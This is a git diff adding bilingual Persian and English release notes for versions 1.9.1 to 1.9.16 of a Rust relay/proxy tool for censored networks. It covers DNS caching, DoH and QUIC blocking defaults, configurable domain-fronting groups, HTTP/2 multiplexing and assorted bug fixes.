+• edge-cache DNS در CodeFull.gs برای skip کردن round-trip tunnel-node (PR [#494](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/494) از @dazzling-no-more): `udp_open` ops با port=53 در `_doTunnelBatch` intercept می‌شن + از `CacheService` (cache hit) یا DoH (cache miss) سرو می‌شن. cache hit‌ها latency typical first-hop DNS رو از ~۶۰۰-۱۲۰۰ms به ~۲۰۰-۴۰۰ms پایین می‌آرن. تغییر pure server-side در CodeFull.gs (فقط Full mode — apps_script mode UDP path نداره). بدون تغییر Rust/client. DoH fallback chain: Cloudflare → Google → Quad9 روی RFC 8484 GET. cache key per-qtype برای جلوگیری از A/AAAA collision. TTL clamping در `[30s, 6h]`. NXDOMAIN/SERVFAIL با ۴۵s negative cache. NODATA-with-SOA بر اساس RFC 2308 §5 SOA TTL رو honor می‌کنه. default-on، opt-out با `ENABLE_EDGE_DNS_CACHE`. هر failure mode به path forward موجود tunnel-node fallback می‌کنه (zero regression). انتخاب CacheService بر روی Sheets به دلیل سرعت (~۱۰ms) + privacy (volatile، روی Drive log persist نمی‌کنه — برای کاربران در صحنه‌های censorship مهمه). ۱۱ تست pure-JS pass.
+• default `tunnel_doh: true` (flipped از `false` در v1.8.x) ([#468](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/468)): default قبلی (DoH bypass فعال) برای کاربران ایرانی بدون نشان دادن چیزی شکست می‌خورد چون Iran ISP direct connection به `dns.google`، `chrome.cloudflare-dns.com` و سایر pinned DoH hosts رو filter می‌کنن — همان hosts که bypass در حال route مستقیم می‌فرستاد. در نتیجه، DNS lookup‌ها fail می‌گرفتن + browsing شکست می‌خورد. حالا default safe است (DoH داخل tunnel نگه داشته می‌شه، در یک شبکه فیلتر شده کار می‌کنه). کاربری روی شبکه‌هایی که direct DoH کار می‌کنه (non-Iran)، می‌تونه `tunnel_doh: false` در config بگذاره برای latency win. تغییر backwards-compatible برای configs موجود — همه‌ی configs دارای فیلد explicit `tunnel_doh` رفتار حفظ می‌شن.
+• اشتراک‌گذاری Hotspot iOS/laptop (PR [#483](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/483) از @yyoyoian-pixel): default `listen_host` از `127.0.0.1` به `0.0.0.0` تغییر کرده. این workflow معمول رو enable می‌کنه — یک phone Android که tunnel run می‌کنه، iPhone یا laptop روی همان hotspot WiFi می‌تونه از proxy استفاده کنه. configs قدیمی با explicit `listen_host: "127.0.0.1"` honor می‌شن (بازنویسی نمی‌شن).
+---
+• **Minor breaking: `mode = "google_only"` renamed to `mode = "direct"`** (PR [#488](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/488) by @dazzling-no-more): the old name no longer described the mode now that `fronting_groups` reaches more than Google. Rust + Android + UI dropdown all updated, but **`google_only` is preserved as a deprecated alias on parse** — existing configs and saved settings don't break. On the next Save, the on-disk file migrates automatically to `direct`. Docs (README EN+FA, SF_README EN+FA, tunnel-node FA) carry a "was named `google_only` before v1.9 — old name still works" note so users following older guides / Telegram posts find their way.
+• `fronting_groups`: multi-edge domain fronting for non-Google CDNs (PR [#488](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/488) by @dazzling-no-more, credit to [@patterniha/MITM-DomainFronting](https://github.com/patterniha/MITM-DomainFronting) for the original technique): new config field `fronting_groups: [{name, ip, sni, domains}]`. Each group is `(edge IP, front SNI, member domains)`: when a CONNECT to one of the member domains arrives, the proxy MITMs at the local CA, then re-encrypts upstream against `ip` with `sni` as the TLS SNI — same trick we already do for `google_ip` + `front_domain`, now configurable for any multi-tenant CDN edge (Vercel, Fastly, etc.). Wins over the built-in Google SNI-rewrite suffix list; loses to `passthrough_hosts` and DoH bypass. Skipped in `mode = full` (which preserves end-to-end TLS and can't MITM). Working example at `config.fronting-groups.example.json`. Full doc at `docs/fronting-groups.md` including the recipe for picking `(ip, sni)`, routing precedence, and an explicit ⚠️ warning about the cross-tenant Host-header leak failure mode (don't list domains that aren't actually on the edge). Review fixes folded: SNI validated via rustls at config-load gate; `Vec<Arc<>>` refcount on per-CONNECT match; byte-level dot-anchored matcher (no per-match `format!()`); startup warnings for inert combos.
+• Edge-cache DNS in `CodeFull.gs` to skip the tunnel-node round-trip (PR [#494](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/494) by @dazzling-no-more): intercepts `udp_open` / port=53 ops in `_doTunnelBatch` and serves them from `CacheService` (cache hit) or DoH (cache miss). Cache hits drop typical first-hop DNS latency from ~600-1200ms to ~200-400ms. Pure server-side change in `CodeFull.gs` (Full mode only — apps_script mode has no UDP path); zero Rust/client changes. DoH fallback chain: Cloudflare → Google → Quad9 over RFC 8484 GET. Per-qtype cache key keeps A and AAAA from colliding. Min RR TTL clamped to `[30s, 6h]`; NXDOMAIN/SERVFAIL get a 45s negative cache; NODATA-with-SOA honors the SOA TTL per RFC 2308 §5. Default-on, opt-out via `ENABLE_EDGE_DNS_CACHE`. Every failure mode (parse error, resolver outage, key-too-long, `cache.put` rejection) falls through to the existing tunnel-node forward path — zero regression on any failure. CacheService chosen over Sheets (#443's pattern) because Sheets reads/writes are 100-500ms per op (often slower than the DoH lookup we'd be caching), have a daily-quota hazard, and persist a Drive-listed log of every domain users resolve — a real privacy regression for users in censorship contexts. CacheService is ~10ms, volatile, free, no on-disk artifact. 11 pure-JS tests covering parsers, txid non-mutation, TTL clamp, NXDOMAIN-with-SOA TTL extraction, malformed/truncated input rejection, splice correctness for mixed batches.
+• Default `tunnel_doh: true` (flipped from `false` in v1.8.x) ([#468](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/468)): the previous default (DoH bypass active) silently broke for Iranian users because Iran ISPs filter direct connections to `dns.google`, `chrome.cloudflare-dns.com`, and other pinned DoH hosts — exactly the hosts the bypass was routing direct. DNS resolution failed and browsing broke. The safer default keeps DoH inside the tunnel; users on networks where direct DoH works can opt back into the bypass with `tunnel_doh: false`. Backwards-compatible for existing configs — anyone who explicitly set `tunnel_doh` keeps their behavior. Iranian users on pre-v1.8.6 versions hitting this regression should upgrade.
+• Hotspot sharing for iOS / laptop (PR [#483](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/483) by @yyoyoian-pixel): default `listen_host` changed from `127.0.0.1` to `0.0.0.0`. Enables the common workflow where an Android phone runs the tunnel and an iPhone/iPad/laptop on the same hotspot uses it as a proxy (HTTP `192.168.43.1:8080` or SOCKS5 `:1081`). For full device-wide coverage on iOS, Shadowrocket or Potatso create a local VPN that routes all traffic through the SOCKS5 on the Android phone. Old configs with explicit `"listen_host": "127.0.0.1"` are honored (not overwritten).
diff --git a/docs/changelog/v1.9.1.md b/docs/changelog/v1.9.1.md
new file mode 100644
index 00000000..675d549c
--- /dev/null
+++ b/docs/changelog/v1.9.1.md
@@ -0,0 +1,10 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• tunable کردن آستانه auto-blacklist با ۳ field config جدید: `auto_blacklist_strikes` (default 3)، `auto_blacklist_window_secs` (default 30)، `auto_blacklist_cooldown_secs` (default 120) ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391)، [#444](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/444)): تا قبل، threshold روی ۳ timeout در ۳۰ ثانیه = ۱۲۰ ثانیه cooldown hard-coded بود. کاربران single-deployment گزارش دادن این threshold روی شبکه‌های flaky too aggressive هست — یک cold-start stall + دو network blip → فقط deployment آن‌ها lockout می‌شه. حالا قابل تنظیم: single-deployment users می‌تونن `auto_blacklist_strikes: 5` یا `auto_blacklist_cooldown_secs: 30` بزارن. کاربران multi-deployment با ۱۰+ alternatives می‌تونن `auto_blacklist_strikes: 2` بزارن برای fail-fast. defaults رفتار قدیمی رو حفظ می‌کنن — هیچ کاربری چیزی notice نمی‌کنه مگر در config صریح override کنه. هنوز در UI form expose نشده — power-user file edit در config.json. فیلدهای duration روی [1, 86400] clamp می‌شن برای جلوگیری از مقادیر غیرمعقول.
+• `request_timeout_secs` config (default 30) برای تنظیم batch HTTP timeout ([#430](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/430)، masterking32 PR #25): تا قبل `BATCH_TIMEOUT = 30s` hard-coded. شبکه‌های Iran ISP slow ممکنه `45` یا `60` بخوان تا Apps Script فرصت پاسخ‌دادن بعد از throttle window رو داشته باشه. شبکه‌های با fail-fast preference ممکنه `15` بخوان برای retry سریع‌تر هنگام hang. clamp [5s, 300s]. در UI form expose نشده.
+• warning روشن‌تر در tunnel-node startup برای recurring `MHRV_AUTH_KEY` typo ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391)، [#444](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/444)): چندین قدیمی copy-paste guide از `MHRV_AUTH_KEY` به‌جای `TUNNEL_AUTH_KEY` در docker run استفاده می‌کرد. tunnel-node اون env var رو هرگز نمی‌خوند + silently default `changeme` رو fallback می‌کرد، که باعث AUTH_KEY-mismatch decoy می‌شد در client. حالا اگر `MHRV_AUTH_KEY` set باشه ولی `TUNNEL_AUTH_KEY` نباشه، tunnel-node پیغام specific می‌ده: "MHRV_AUTH_KEY is set but TUNNEL_AUTH_KEY is not — tunnel-node only reads TUNNEL_AUTH_KEY (uppercase, with underscores). Rename your env var: docker run ... -e TUNNEL_AUTH_KEY=...". این به کاربر مستقیم کمک می‌کنه به‌جای ساعت‌ها debug.
+• run.bat fallback به CLI بعد از UI failure ([#417](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/417)، [#426](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/426)، [#487](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/487)): قبلاً وقتی هر دو UI renderer (glow + wgpu) fail می‌گرفتن (روی ماشین‌های قدیمی Windows / RDP / VM بدون GPU)، script پیغام "open issue" می‌داد + exit. حالا بعد از پیغام error، CLI `mhrv-rs.exe` رو خود اجرا می‌کنه + کاربر می‌تونه به استفاده از proxy ادامه دهد. CLI همان full functionality رو داره بدون UI shell — proxy روی `127.0.0.1:8085` (HTTP) و `127.0.0.1:8086` (SOCKS5).
+---
+• Tunable auto-blacklist threshold via three new config fields: `auto_blacklist_strikes` (default 3), `auto_blacklist_window_secs` (default 30), `auto_blacklist_cooldown_secs` (default 120) ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391), [#444](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/444)): previously hard-coded at "3 timeouts in 30s = 120s cooldown". Single-deployment users reported this threshold was too aggressive on flaky networks — one cold-start stall plus two transient network blips would lock them out of their only relay path. Now tunable: single-deployment users can set `auto_blacklist_strikes: 5` or `auto_blacklist_cooldown_secs: 30` to be more forgiving. Multi-deployment users with 10+ healthy alternatives can set `auto_blacklist_strikes: 2` to fail-fast. Defaults preserve existing behavior — no user notices a change unless they explicitly tune in `config.json`. Not exposed in the UI form yet — power-user file edit. Clamped to [1, 86400] for the duration fields to prevent absurd values.
+• `request_timeout_secs` config field (default 30) to tune the batch HTTP timeout ([#430](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/430), masterking32 PR #25): previously the hard-coded `BATCH_TIMEOUT = 30s` constant. Slow Iran ISP networks may want `45` or `60` to give Apps Script time to respond past throttle windows. Networks preferring fail-fast may want `15` to retry sooner when a deployment hangs. Clamped to [5s, 300s] (longer values bring no benefit, since Apps Script's hard execution cap is 6 minutes). Not in the UI form.
+• Clearer tunnel-node startup warning for the recurring `MHRV_AUTH_KEY` typo ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391), [#444](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/444)): several older copy-paste guides used `MHRV_AUTH_KEY` instead of `TUNNEL_AUTH_KEY` in `docker run`. tunnel-node never read that env var and silently fell back to default `changeme`, producing baffling AUTH_KEY-mismatch decoys on the client. Now if `MHRV_AUTH_KEY` is set but `TUNNEL_AUTH_KEY` is not, tunnel-node emits a specific warning: `"MHRV_AUTH_KEY is set but TUNNEL_AUTH_KEY is not — tunnel-node only reads TUNNEL_AUTH_KEY (uppercase, with underscores). Rename your env var: docker run ... -e TUNNEL_AUTH_KEY=<your-secret>"`. Saves users hours of debugging the wrong layer.
+• `run.bat` falls back to CLI after UI renderer failure ([#417](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/417), [#426](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/426), [#487](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/487)): when both UI renderers (glow + wgpu) fail on older Windows machines, RDP sessions, or VMs without GPU acceleration, the script previously printed an "open an issue on GitHub" message and exited. Now it prints the diagnostic info AND launches `mhrv-rs.exe` (CLI) so the user can keep using the proxy without the UI shell. CLI has the same proxy functionality on `127.0.0.1:8085` (HTTP) and `127.0.0.1:8086` (SOCKS5); only the visual UI is missing.
diff --git a/docs/changelog/v1.9.10.md b/docs/changelog/v1.9.10.md
new file mode 100644
index 00000000..d9d55d6b
--- /dev/null
+++ b/docs/changelog/v1.9.10.md
@@ -0,0 +1,8 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• exit-node docs بازنویسی شد به‌صورت platform-agnostic. اسکریپت TypeScript حالا `assets/exit_node/exit_node.ts` نام داره (قبلاً `valtown.ts`) و راهنماها روی Deno Deploy / fly.io / VPS شخصی به‌عنوان host‌های توصیه‌شده تمرکز می‌کنن. کد TypeScript خود بدون تغییر است — همان web-standard `Request` / `Response` / `fetch` API که روی هر runtime serverless اجرا می‌شه. کاربرانی که قبلاً exit-node را روی پلتفرم انتخابی خود deploy کرده‌اند نیازی به تغییر ندارند.
+• Telegram channel announcements حالا brief English bullets می‌گیرن به‌جای Persian کامل (commit `9580ce8`). subscriber‌ها در یک نگاه می‌بینن چی ship شده — full Persian + English changelog همچنان در `docs/changelog/v*.md` برای archive باقی می‌مونه.
+• تست: ۱۷۹ lib + ۳۵ tunnel-node test همه pass.
+---
+• Rewrote the exit-node docs to be platform-agnostic. The TypeScript handler is now named `assets/exit_node/exit_node.ts` (was `valtown.ts`) and the setup guide focuses on Deno Deploy / fly.io / your own VPS as the recommended hosts. The TypeScript itself is unchanged — same web-standard `Request` / `Response` / `fetch` API that runs on any serverless runtime. Users who already have an exit node deployed on whichever host they picked don't need to change anything.
+• Telegram channel announcements now use brief English bullets instead of full Persian (commit `9580ce8`). Subscribers see what shipped at a glance — the full Persian + English changelog stays in `docs/changelog/v*.md` for archival.
+• Tests: 179 lib + 35 tunnel-node tests passing.
diff --git a/docs/changelog/v1.9.11.md b/docs/changelog/v1.9.11.md
new file mode 100644
index 00000000..88d2cb09
--- /dev/null
+++ b/docs/changelog/v1.9.11.md
@@ -0,0 +1,18 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Block DoH by default (PR [#763](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/763) از @yyoyoian-pixel): مرورگرها روی DoH (chrome.cloudflare-dns.com، dns.google، …) به‌طور پیش‌فرض هر name lookup را از طریق tunnel می‌فرستند که ~۱.۵ثانیه overhead به هر page load اضافه می‌کنه. حالا با `block_doh: true` (پیش‌فرض)، CONNECTهای DoH فوراً reject می‌شن — مرورگر به system DNS fallback می‌کنه که `tun2proxy` با virtual DNS فوراً resolve می‌کنه. روی Android UI: Block DoH و Bypass DoH toggle در Advanced. Block over Bypass تقدم داره. همچنین fix bug Android: `tunnelDoh` در Android default `false` بود و در Rust `true`، باعث می‌شد config mismatch بشه و `bypass_doh_hosts` روی Android خاموش بمونه — اکنون default‌ها synced.
+• TLS connection pool tuning (PR [#751](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/751) از @yyoyoian-pixel):
+  - **Pool refill loop:** background task که دائماً ≥۸ connection ready نگه می‌داره، یکی یکی (نه burst) باز می‌کنه با ۵ ثانیه interval check
+  - **Freshest-first acquire:** به‌جای pop کردن آخرین entry، connection با بیشترین TTL باقی‌مانده انتخاب می‌شه
+  - **Pool TTL ۴۵→۶۰ ثانیه:** connection‌ها بیشتر زنده می‌مونن، churn کاهش
+  - **Coalesce step ۱۰→۲۰۰ms:** Full mode batch packing تنظیم — bottleneck dominant ~۱.۵s Apps Script round-trip است، 200ms wait نسبت به اون نامحسوس و ۳-۵× ops per batch بیشتر pack می‌کنه روی page load. (مقدار قبلی 10ms از v1.9.8 بود — این revert محافظه‌کارانه‌تر است.)
+• Fronting groups example: `github.io` به Fastly group اضافه شد (PR [#747](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/747) از @Shjpr9). GitHub Pages روی Fastly anycast `151.101.x.x` است.
+• تست: ۱۷۹ lib + ۳۵ tunnel-node test همه pass.
+---
+• Block DoH by default (PR [#763](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/763) from @yyoyoian-pixel): browsers' DoH (chrome.cloudflare-dns.com, dns.google, …) was sending every name lookup through the tunnel by default, adding ~1.5s overhead per page load. With `block_doh: true` (now default), DoH CONNECTs are rejected immediately — the browser falls back to system DNS, which `tun2proxy` resolves instantly via virtual DNS. Android UI: Block DoH and Bypass DoH toggles in Advanced settings; Block takes priority over Bypass. Also fixes an Android config bug where `tunnelDoh` defaulted to `false` Android-side but `true` in Rust — the field was never serialized so `bypass_doh_hosts` matching was silently broken on every fresh Android install. Defaults are now synced.
+• TLS connection pool tuning (PR [#751](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/751) from @yyoyoian-pixel):
+  - **Pool refill loop:** background task that maintains ≥8 ready connections, opening them one at a time (no burst) with a 5s interval check
+  - **Freshest-first acquire:** picks the connection with the most remaining TTL instead of popping whatever is on top
+  - **Pool TTL 45→60s:** connections live longer, less churn
+  - **Coalesce step 10→200ms:** Full mode batch packing; the dominant bottleneck is the ~1.5s Apps Script round-trip, so 200ms wait is negligible against it but packs 3–5× more ops per batch during page loads. (The previous 10ms value was the v1.9.8 default — this is a more conservative revert.)
+• Fronting groups example: added `github.io` to the Fastly group (PR [#747](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/747) from @Shjpr9). GitHub Pages is on the same Fastly anycast `151.101.x.x` as the other entries in that group.
+• Tests: 179 lib + 35 tunnel-node tests passing.
diff --git a/docs/changelog/v1.9.12.md b/docs/changelog/v1.9.12.md
new file mode 100644
index 00000000..e7ee6959
--- /dev/null
+++ b/docs/changelog/v1.9.12.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Fix `parallel_relay` causing duplicate POSTs ([#743](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/743)): وقتی `parallel_relay > 1` تنظیم بود، تک‌POST کاربر (مثل ارسال کامنت در GitHub) به‌عنوان دو/چند درخواست همزمان به سایت مقصد می‌رسید + کامنت دو بار ثبت می‌شد. علت: `select_ok` فقط future‌های Rust سمت ما را cancel می‌کنه، ولی Apps Script در سمت سرور هیچ خبری از cancel ندارد — هر فراخوانی fan-out روی Apps Script کامل می‌شه و `UrlFetchApp.fetch()` هر کدام به مقصد می‌رسه. حالا fan-out فقط برای متدهای **idempotent** (GET / HEAD / OPTIONS) اجرا می‌شه؛ POST / PUT / PATCH / DELETE همیشه sequential می‌رن — کاربر روی browse کاهش tail latency رو نگه می‌داره و روی form submit از duplicate side-effect ایمن می‌مونه. الگوی همان `SAFE_REPLAY_METHODS` که در `Code.gs` `_doBatch` fallback داریم. تست regression جدید locks down predicate. **۱۸۰ lib + ۳۵ tunnel-node test** همه pass.
+---
+• Fix `parallel_relay` causing duplicate POSTs ([#743](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/743)): with `parallel_relay > 1` set, a single user POST (e.g. submitting a comment on GitHub) was reaching the destination as two or more concurrent requests, so the comment got posted twice. Root cause: `select_ok` only cancels the loser futures on our side, but Apps Script has no way to learn about that cancellation server-side, so every fan-out call still runs to completion and each `UrlFetchApp.fetch()` to the destination still fires. Fan-out now only triggers for **idempotent** methods (GET / HEAD / OPTIONS); POST / PUT / PATCH / DELETE always go sequential — users keep the p95 tail-latency win on browsing without losing correctness on form submits. Same pattern as the `SAFE_REPLAY_METHODS` guard in `Code.gs` `_doBatch` fallback. New regression test locks down the predicate. **180 lib + 35 tunnel-node tests passing.**
diff --git a/docs/changelog/v1.9.13.md b/docs/changelog/v1.9.13.md
new file mode 100644
index 00000000..16691c0a
--- /dev/null
+++ b/docs/changelog/v1.9.13.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Hotfix v1.9.11 / v1.9.12 build failure: PR [#763](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/763) فیلد جدید `block_doh` به `Config` اضافه کرد ولی `src/bin/ui.rs::FormState` (که Config رو با struct literal می‌سازه) به‌روز نشد، در نتیجه `mhrv-rs-ui` در CI با `error[E0063]: missing field 'block_doh'` کامپایل نشد. هر دو release CI v1.9.11 و v1.9.12 fail شدن — هیچ binary منتشر نشد. این release همان تغییرات رو با fix UI ship می‌کنه. **پیامد محصول:** v1.9.13 = v1.9.11 + v1.9.12 + UI compile fix. تست: 180 lib + 35 tunnel-node + UI release-mode build همه green.
+---
+• Hotfix v1.9.11 / v1.9.12 build failure: PR [#763](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/763) added a new `block_doh` field to `Config` but didn't update `src/bin/ui.rs::FormState` (which constructs `Config` via a struct literal), so `mhrv-rs-ui` failed to compile in CI with `error[E0063]: missing field 'block_doh'`. Both v1.9.11 and v1.9.12 release CI runs failed and shipped no binaries. This release is the same set of changes with the UI compile fix included. **Product impact:** v1.9.13 = v1.9.11 + v1.9.12 + UI compile fix. Tests: 180 lib + 35 tunnel-node + UI release-mode build all green.
diff --git a/docs/changelog/v1.9.14.md b/docs/changelog/v1.9.14.md
new file mode 100644
index 00000000..85817fad
--- /dev/null
+++ b/docs/changelog/v1.9.14.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Fix v1.9.13 regression — کاربران v1.9.10 → v1.9.13 upgrade می‌کردن و حس می‌کردن کندتره ([#773](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/773)). علت: `block_doh` در Rust با `#[serde(default)]` برای فیلد `bool` به `false` resolve می‌شد (default trait از Rust)، نه `true` که PR [#763](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/763) قصد داشت. کاربران existing با config.json بدون فیلد `block_doh` و `tunnel_doh = true` (default جدید از #468)، هر DNS lookup رو از مسیر Apps Script می‌فرستادن — ~۱.۵ ثانیه overhead هر page load. حالا `block_doh` با named-default function به `true` resolve می‌شه — مرورگر DoH reject می‌شه + system DNS via tun2proxy فوراً پاسخ می‌ده + هیچ tunnel round-trip دیگه. کاربران power که عمداً DoH از تونل می‌خوان، می‌تونن `block_doh: false` صریح بگذارن. تست: 180 lib + 35 tunnel-node + UI release-mode build همه green.
+---
+• Fix v1.9.13 perceived-slowness regression on upgrade ([#773](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/773)): `block_doh` was using `#[serde(default)]` on a `bool`, which resolves to Rust's `Default::default() = false` rather than the `true` PR [#763](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/763) intended. Existing configs upgrading from v1.9.10 had no `block_doh` field, so they got `false` paired with `tunnel_doh = true` (the new default from #468) — every browser DoH lookup got tunneled through Apps Script, adding ~1.5s overhead per page load. Now `block_doh` uses a named-default function that returns `true` — DoH is rejected at the SOCKS5 listener so the browser falls back to system DNS (instant, via tun2proxy's virtual DNS) and no tunnel round-trip happens. Power users who specifically want DoH-through-tunnel can opt back in with `block_doh: false`. Tests: 180 lib + 35 tunnel-node + UI release-mode build all green.
diff --git a/docs/changelog/v1.9.15.md b/docs/changelog/v1.9.15.md
new file mode 100644
index 00000000..c6aac2ee
--- /dev/null
+++ b/docs/changelog/v1.9.15.md
@@ -0,0 +1,12 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• HTTP/2 multiplexing روی relay leg (PR [#799](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/799) از @dazzling-no-more): ALPN از Google edge `h2` رو negotiate می‌کنه؛ اگه peer قبول کنه، تمام relay traffic (Apps Script direct، exit-node outer call، full-mode tunnel single ops، full-mode tunnel batches) روی یک TCP/TLS connection با ~۱۰۰ stream همزمان multiplex می‌شه به‌جای pool 8-80 socket. اگر h2 negotiate نشه، fallback خودکار به HTTP/1.1 keep-alive path قبلی. مزیت اصلی: یک Apps Script call کند دیگه head-of-line بقیه‌ی queue روی همان socket رو block نمی‌کنه — مهم‌ترین اثر روی streaming sites (YouTube/googlevideo) و concurrent fan-out (range-parallel downloads). Idempotency-safe retry: `RequestSent::{No, Maybe}` — `No` (قبل از send_request موفق) safely retried، `Maybe` فقط برای متدهای idempotent. **Kill switch:** `"force_http1": true` در config.json تمام h2 path رو bypass می‌کنه و دقیقاً behavior pre-PR رو می‌ده. استراتژیک، این architectural fix برای regression #781 / #773 — h2 multiplexing pool tuning مسئله‌ی بسیار کم‌اهمیت می‌کنه. ۱۸۰→۱۹۷ test (+۱۷ test جدید).
+• Block QUIC default `true` (PR [#805](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/805) از @yyoyoian-pixel): QUIC روی tunnel TCP-based منجر به TCP-over-TCP meltdown (<1 Mbps) می‌شد. مرورگرها با drop UDP/443 خاموش، در ثانیه‌ها به TCP/HTTPS برمی‌گردن — نتیجه: page load و YouTube video load ابتدایی در Full mode به‌طرز محسوسی سریع‌تر. UI toggle در Android Advanced + Desktop checkbox (قبلاً config-only از #213). Android serialization همیشه `block_quic` رو emit می‌کنه تا default Rust silently override نشه.
+• Accessibility: `accesskit` feature برای eframe فعال شد (PR [#819](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/819) از @brightening-eyes — drop به نفع #750). screen reader users (NVDA / JAWS / VoiceOver / Orca) حالا کامل می‌تونن از UI استفاده کنن. tested with real screen reader by author.
+• GitHub Actions Full tunnel docs (PR [#783](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/783) از @euvel): ۳ مسیر برای کاربرانی که نمی‌توانن VPS بخرن — cloudflared Quick (zero accounts beyond GitHub، URL موقت)، ngrok (free account، URL موقت)، cloudflared Named (CF domain، URL دایم). در `assets/github-actions-tunnel/`. هر runner GitHub Actions ۶ ساعت timeout داره — repeatable ولی persistent نه. برای daily traffic سنگین همچنان VPS توصیه می‌شه.
+• تست: ۱۹۷ lib + ۳۵ tunnel-node test همه pass.
+---
+• HTTP/2 multiplexing on relay leg (PR [#799](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/799) from @dazzling-no-more): ALPN-negotiates `h2` against the Google edge; if the peer agrees, all relay traffic (Apps Script direct, exit-node outer call, full-mode tunnel single ops, full-mode tunnel batches) rides one TCP/TLS connection multiplexing ~100 concurrent streams instead of the legacy 8-80-socket pool. Falls back to the existing HTTP/1.1 keep-alive path automatically when h2 isn't viable. Big win: a slow Apps Script call no longer head-of-line-blocks the rest of the queue on the same socket — most user-visible on streaming sites (YouTube/googlevideo) and concurrent fan-out (range-parallel downloads). Idempotency-safe retry via `RequestSent::{No, Maybe}` — `No` (anything before `send_request` succeeds) is safely retried, `Maybe` only retries for idempotent methods. **Kill switch:** `"force_http1": true` in config.json bypasses the entire h2 path and gives back exactly the pre-PR behaviour. Strategically this is the architectural fix for the perceived-slowness regression in #781 / #773 — h2 multiplexing makes the pool tuning machinery much less load-bearing because one connection serves all requests. 180 → 197 lib tests (+17 covering ALPN selection, sticky disable, RequestSent classification on RST_STREAM, 421 handling, gzip parity, POST body transmission, redirect chain, force_http1 round-trip).
+• Block QUIC by default (PR [#805](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/805) from @yyoyoian-pixel): QUIC over the TCP-based tunnel was causing TCP-over-TCP meltdown (<1 Mbps). With UDP/443 silently dropped, browsers detect the failure and fall back to TCP/HTTPS within seconds — significantly faster initial page and YouTube video load times in Full mode. UI: "Block QUIC" toggle in Android Advanced settings, "Block QUIC (UDP/443)" checkbox in desktop UI (was config-only since #213). Android serialization always emits `block_quic` so the Rust default can't silently override the user's choice.
+• UI accessibility: enabled the `accesskit` feature on eframe (PR [#819](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/819) from @brightening-eyes — closes #750). Screen reader users (NVDA / JAWS / VoiceOver / Orca) can now navigate the desktop UI cleanly. Tested with a real screen reader by the contributor.
+• GitHub Actions Full tunnel docs (PR [#783](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/783) from @euvel): 3 paths for users who can't or won't buy a VPS — cloudflared Quick (zero accounts beyond GitHub, temporary URL), ngrok (free account, temporary URL), cloudflared Named (CF domain, permanent URL). Lives in `assets/github-actions-tunnel/`. Each GitHub Actions runner has a 6-hour timeout — repeatable but not persistent; serious daily traffic should still go through a VPS.
+• Tests: 197 lib + 35 tunnel-node tests passing.
diff --git a/docs/changelog/v1.9.16.md b/docs/changelog/v1.9.16.md
new file mode 100644
index 00000000..86b9547b
--- /dev/null
+++ b/docs/changelog/v1.9.16.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
